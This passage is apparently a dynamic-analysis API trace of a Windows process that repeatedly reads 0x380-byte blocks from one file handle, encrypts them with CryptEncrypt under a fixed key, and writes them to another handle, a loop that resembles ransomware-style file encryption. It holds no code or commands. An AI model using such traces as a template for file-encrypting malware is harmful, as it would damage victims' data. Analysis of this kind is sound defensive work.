[0245.120] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0245.120] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0245.120] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0245.120] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0245.120] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0245.120] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0245.120] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0245.120] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0245.121] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0245.121] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0245.121] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0245.121] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0245.121] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0245.121] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0245.121] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0245.121] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0245.121] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0245.121] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0245.121] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0245.121] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0245.121] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0245.122] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0245.122] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0245.122] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0245.122] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0245.122] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0245.122] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0245.122] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0245.122] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0245.122] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0245.122] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0245.122] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0245.122] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0245.122] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0245.122] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0245.123] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0245.123] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0245.123] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0245.123] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0245.123] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0245.123] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0245.123] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0245.123] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0245.123] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0245.123] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0245.123] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0245.123] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0245.123] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0245.124] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0245.124] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0245.124] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0245.124] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0245.124] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0245.124] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0245.124] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0245.124] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0245.124] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0245.124] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0245.124] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0245.124] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0245.124] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0245.124] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0245.125] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0245.125] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0245.125] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0245.125] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0245.125] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0245.125] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0245.125] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0245.125] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0245.125] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0245.125] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0245.125] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0245.125] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0245.125] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0245.125] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0245.126] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0245.126] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0245.126] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0245.126] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0245.126] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0245.126] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0245.126] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0245.126] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0245.126] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0245.126] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0245.126] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0245.126] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0245.126] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0245.127] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0245.127] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0245.127] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0245.127] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0245.127] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0245.127] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0245.128] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0245.128] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0245.128] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0245.128] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0245.128] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, 